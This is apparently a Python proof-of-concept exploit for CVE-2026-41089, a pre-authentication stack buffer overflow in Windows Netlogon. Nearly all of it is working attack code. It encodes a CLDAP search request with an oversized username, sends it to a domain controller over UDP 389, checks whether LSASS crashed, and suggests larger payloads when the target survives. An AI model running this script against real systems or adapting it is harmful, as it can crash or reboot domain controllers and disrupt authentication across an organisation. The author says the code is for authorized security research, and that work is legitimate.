README.md
Rendering markdown...
# DISCLAIMER: This proof-of-concept is provided for educational and authorized
# security research purposes only. The author(s) accept no responsibility or
# liability for any misuse, damage, or loss caused by the use of this code.
# Use at your own risk.
"""
CVE-2026-41089 PoC - Netlogon Stack Buffer Overflow via CLDAP Ping
===================================================================
Sends a CLDAP (Connectionless LDAP over UDP 389) DC locator ping request
with an oversized username to trigger a stack buffer overflow in
netlogon!NetpLogonPutUnicodeString -> netlogon!BuildSamLogonResponse.
The vulnerable code path:
I_NetLogonLdapLookupEx -> NlGetLocalPingResponse -> LogonRequestHandler
-> BuildSamLogonResponse -> NetpLogonPutUnicodeString
NlGetLocalPingResponse allocates a 528-byte stack buffer (Src[528]) and
passes it to BuildSamLogonResponse. BuildSamLogonResponse calls
NetpLogonPutUnicodeString multiple times to write Unicode strings into
this buffer without bounds checking.
The root cause: the maximum string length passed to NetpLogonPutUnicodeString
was specified in bytes but treated as a count of WCHARs, doubling the effective write.
The "User" field in the CLDAP filter is attacker-controlled (up to 130 wchars).
Combined with server name, domain name, GUIDs, and DNS names, the total write
exceeds 528 bytes and overflows the stack.
Target: Windows Server 2012 through 2025 Domain Controllers (pre-patch)
Impact: LSASS crash -> DC reboot (~60 seconds). RCE possible but not demonstrated.
Attack vector: UDP port 389 (CLDAP), pre-authentication, no credentials needed
CVE: CVE-2026-41089, CVSS 9.8 CRITICAL, CWE-121
Published: May 12, 2026 by Microsoft (found internally)
"""
import argparse
import socket
import struct
import sys
import time
# ---------------------------------------------------------------------------
# BER/DER encoding primitives
# ---------------------------------------------------------------------------
def encode_ber_length(length):
    """Encode a BER definite-form length field (X.690 8.1.3).

    Lengths below 0x80 use the single-byte short form. Larger lengths use
    the long form: a prefix byte of ``0x80 | N`` followed by the length as
    ``N`` big-endian bytes, with ``N`` as small as possible.

    Args:
        length: Non-negative number of content octets.

    Returns:
        The encoded length octets as ``bytes``.

    Raises:
        ValueError: If ``length`` is negative.
    """
    if length < 0:
        raise ValueError(f"Negative length not supported: {length}")
    if length < 0x80:
        return bytes([length])
    # Size the long form from the value itself so that lengths of 2**24 and
    # above are encoded in full instead of being truncated to three bytes.
    num_octets = (length.bit_length() + 7) // 8
    return bytes([0x80 | num_octets]) + length.to_bytes(num_octets, 'big')
def encode_ber_int(value):
    """Encode a non-negative BER INTEGER (tag 0x02).

    The content octets are the minimal big-endian two's-complement form
    (X.690 8.3.2): a leading 0x00 octet is emitted only when the top bit of
    the first value octet would otherwise be set and make the value read
    as negative.

    Args:
        value: Non-negative integer to encode.

    Returns:
        The complete tag-length-value encoding as ``bytes``.

    Raises:
        ValueError: If ``value`` is negative.
    """
    if value < 0:
        raise ValueError(f"Negative integers not supported: {value}")
    # bit_length() // 8 + 1 always leaves the sign bit clear: 0x7F fits in
    # one octet, 0x80 takes two (00 80), 0x8000 takes three (00 80 00).
    payload = value.to_bytes(value.bit_length() // 8 + 1, 'big')
    return bytes([0x02]) + encode_ber_length(len(payload)) + payload
def encode_ber_enum(value):
    """Encode a non-negative BER ENUMERATED (tag 0x0a).

    The content octets follow the same rule as INTEGER: minimal big-endian
    two's-complement, with a leading 0x00 octet only when needed to keep
    the sign bit clear.

    Args:
        value: Non-negative enumeration value to encode.

    Returns:
        The complete tag-length-value encoding as ``bytes``.

    Raises:
        ValueError: If ``value`` is negative.
    """
    if value < 0:
        raise ValueError(f"Negative enum not supported: {value}")
    # Sized from the value so the top bit of the first octet is never set
    # (which would decode as negative) and large values are not rejected.
    payload = value.to_bytes(value.bit_length() // 8 + 1, 'big')
    return bytes([0x0a]) + encode_ber_length(len(payload)) + payload
def encode_ber_string(tag, value):
    """Encode a string-like value under the given one-byte tag.

    Args:
        tag: Tag octet to emit (e.g. 0x04 for OCTET STRING).
        value: Content; a ``str`` is UTF-8 encoded first, anything else is
            used as-is.

    Returns:
        Tag octet, BER length, then the content octets.
    """
    payload = value.encode('utf-8') if isinstance(value, str) else value
    header = bytes([tag]) + encode_ber_length(len(payload))
    return header + payload
def encode_ber_sequence(tag, contents):
    """Wrap already-encoded contents in a constructed element.

    Args:
        tag: Tag octet for the wrapper (e.g. 0x30 for SEQUENCE).
        contents: Concatenated encodings of the inner elements.

    Returns:
        Tag octet, BER length of ``contents``, then ``contents``.
    """
    tag_octet = bytes([tag])
    length_octets = encode_ber_length(len(contents))
    return tag_octet + length_octets + contents
# ---------------------------------------------------------------------------
# LDAP filter construction
# ---------------------------------------------------------------------------
def build_equality_filter(attr_name, attr_value):
    """Build an LDAP equalityMatch filter element: (attr=value).

    The attribute name and the assertion value are each emitted as an
    OCTET STRING (tag 0x04) and wrapped in tag 0xA3 (context class,
    constructed, tag number 3).

    Args:
        attr_name: Attribute description as ``str``.
        attr_value: Assertion value; a ``str`` is UTF-8 encoded, any other
            value is passed through unchanged.

    Returns:
        The encoded filter element as ``bytes``.
    """
    name_octets = attr_name.encode('utf-8')
    value_octets = (
        attr_value.encode('utf-8') if isinstance(attr_value, str) else attr_value
    )
    pair = b''.join((
        encode_ber_string(0x04, name_octets),
        encode_ber_string(0x04, value_octets),
    ))
    return encode_ber_sequence(0xA3, pair)
# ---------------------------------------------------------------------------
# CLDAP DC Locator Ping
# ---------------------------------------------------------------------------
def build_cldap_ping(target_domain, username, ntver=0x00000016):
    """Build a CLDAP DC locator ping (an LDAP SearchRequest sent over UDP).

    The search filter is
    (&(DnsDomain=<domain>)(User=<username>)(NtVer=<ntver>)) and the only
    requested attribute is "Netlogon". Per MS-ADTS 6.3.3.2 / RFC 4511
    Section 4.5.1.

    Args:
        target_domain: Value for the DnsDomain filter clause.
        username: Value for the User filter clause.
        ntver: NtVer flags, packed as a 4-byte little-endian value.

    Returns:
        The encoded LDAPMessage (messageID 1) as ``bytes``.
    """
    # NtVer travels as raw little-endian bytes rather than as text.
    ntver_octets = struct.pack('<I', ntver)

    # AND filter (context tag 0xA0) over the three equality clauses.
    clauses = (
        ("DnsDomain", target_domain),
        ("User", username),
        ("NtVer", ntver_octets),
    )
    and_filter = encode_ber_sequence(
        0xA0,
        b''.join(build_equality_filter(name, value) for name, value in clauses),
    )

    # Requested attributes: ["Netlogon"]
    attribute_list = encode_ber_sequence(0x30, encode_ber_string(0x04, "Netlogon"))

    # SearchRequest fields in the order given by RFC 4511 Section 4.5.1.
    search_fields = [
        encode_ber_string(0x04, ""),   # baseObject: empty DN
        encode_ber_enum(0),            # scope: baseObject
        encode_ber_enum(0),            # derefAliases: neverDerefAliases
        encode_ber_int(0),             # sizeLimit: no limit
        encode_ber_int(0),             # timeLimit: no limit
        bytes([0x01, 0x01, 0x00]),     # typesOnly: BOOLEAN FALSE
        and_filter,
        attribute_list,
    ]

    # SearchRequest = APPLICATION 3 (tag 0x63)
    search_request = encode_ber_sequence(0x63, b''.join(search_fields))

    # LDAPMessage = SEQUENCE { messageID INTEGER, protocolOp SearchRequest }
    return encode_ber_sequence(0x30, encode_ber_int(1) + search_request)
# ---------------------------------------------------------------------------
# Network I/O
# ---------------------------------------------------------------------------
def send_cldap_ping(target_ip, target_domain, username, port=389, timeout=5):
    """Send one CLDAP ping over UDP and wait for a single reply datagram.

    Args:
        target_ip: IPv4 address to send to.
        target_domain: Domain name placed in the DnsDomain filter clause.
        username: Value placed in the User filter clause.
        port: Destination UDP port.
        timeout: Socket timeout in seconds.

    Returns:
        The raw response bytes (up to 4096), or None if the receive timed
        out or a socket error occurred. Socket errors are also reported on
        stderr.
    """
    packet = build_cldap_ping(target_domain, username)
    # The context manager closes the socket on every exit path, including
    # when settimeout() rejects the timeout value.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.sendto(packet, (target_ip, port))
            try:
                data, _ = sock.recvfrom(4096)
            except socket.timeout:
                # A receive timeout is an expected outcome, not an error.
                return None
            return data
        except OSError as e:
            print(f"[-] Socket error: {e}", file=sys.stderr)
            return None
# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------
def _run_phases(args):
    """Run the three probe phases described by the parsed arguments.

    Phase 1 sends a short-username ping and exits with status 1 if there
    is no reply. Phase 2 sends the ping with the long username. Phase 3
    waits ``args.delay`` seconds and sends another short-username ping to
    see whether the target still answers.
    """
    username = "A" * args.length

    # Phase 1: connectivity check
    print("[1/3] Sending normal CLDAP ping (short username)...")
    resp = send_cldap_ping(
        args.target_ip, args.domain_name, "testuser",
        port=args.port, timeout=args.timeout,
    )
    if resp is None:
        # Report the port actually used rather than assuming the default.
        print(f"[-] No response. DC is not reachable on UDP {args.port}.")
        print("    Verify the target is a domain controller and the port is open.")
        sys.exit(1)
    print(f"[+] DC responded ({len(resp)} bytes). Target is alive.")
    print()

    # Phase 2: send overflow
    print(f"[2/3] Sending overflow payload (username={args.length} chars)...")
    resp = send_cldap_ping(
        args.target_ip, args.domain_name, username,
        port=args.port, timeout=args.timeout,
    )
    if resp is None:
        print("[!] No response. LSASS may have crashed.")
    else:
        print(f"[+] Got response ({len(resp)} bytes). Target processed the packet.")

    # Give LSASS time to crash before the liveness check
    print(f"    Waiting {args.delay}s before liveness check...")
    time.sleep(args.delay)
    print()

    # Phase 3: liveness check
    print("[3/3] Liveness check...")
    resp = send_cldap_ping(
        args.target_ip, args.domain_name, "testuser",
        port=args.port, timeout=args.timeout,
    )
    if resp is None:
        print("[!] DC is not responding. LSASS likely crashed. Expect reboot in ~60s.")
    else:
        print(f"[+] DC responded ({len(resp)} bytes). Still alive.")
        if args.length < 200:
            print(f"    Try a larger payload: -l {min(args.length + 50, 500)}")


def main():
    """Parse the command line, validate it, and run the three phases.

    Exits with status 1 on invalid arguments or when the target does not
    answer the initial ping, and with status 130 when interrupted with
    Ctrl-C at any point during the run.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2026-41089 PoC - Netlogon CLDAP stack buffer overflow",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        # Every invocation sends the oversized request; the first example
        # says so explicitly so it is not mistaken for a harmless ping.
        epilog="""\
examples:
  %(prog)s 10.0.50.21 corp.local              Default run (130-char overflow attempt)
  %(prog)s 10.0.50.21 corp.local -l 130       Overflow attempt (same as default)
  %(prog)s 10.0.50.21 corp.local -l 200       Larger overflow
  %(prog)s 10.0.50.21 corp.local -l 130 -t 10 Longer timeout for slow networks
""",
    )
    parser.add_argument("target_ip", help="IP address of the Domain Controller")
    parser.add_argument("domain_name", help="DNS domain name (e.g. corp.local)")
    parser.add_argument(
        "-l", "--length", type=int, default=130,
        help="Username length in characters (default: 130)",
    )
    parser.add_argument(
        "-t", "--timeout", type=int, default=5,
        help="UDP recv timeout in seconds (default: 5)",
    )
    parser.add_argument(
        "-d", "--delay", type=int, default=3,
        help="Seconds to wait between phase 2 and phase 3 (default: 3)",
    )
    parser.add_argument(
        "-p", "--port", type=int, default=389,
        help="CLDAP port (default: 389)",
    )
    args = parser.parse_args()

    # Reject values that would otherwise surface later as a traceback from
    # settimeout(), time.sleep() or sendto().
    if args.length < 1:
        print("[-] Username length must be >= 1", file=sys.stderr)
        sys.exit(1)
    if args.timeout < 1:
        print("[-] Timeout must be >= 1", file=sys.stderr)
        sys.exit(1)
    if args.delay < 0:
        print("[-] Delay must be >= 0", file=sys.stderr)
        sys.exit(1)
    if not 1 <= args.port <= 65535:
        print("[-] Port must be between 1 and 65535", file=sys.stderr)
        sys.exit(1)

    print("=" * 60)
    print("CVE-2026-41089 - Netlogon Stack Buffer Overflow PoC")
    print("=" * 60)
    print()
    print(f"  Target:   {args.target_ip}:{args.port}")
    print(f"  Domain:   {args.domain_name}")
    print(f"  Username: {args.length} chars ({args.length * 2} bytes as UTF-16)")
    print(f"  Timeout:  {args.timeout}s")
    print()

    # One handler covers all three phases so Ctrl-C behaves the same
    # wherever it arrives.
    try:
        _run_phases(args)
    except KeyboardInterrupt:
        print("\n[!] Interrupted.")
        sys.exit(130)


if __name__ == "__main__":
    main()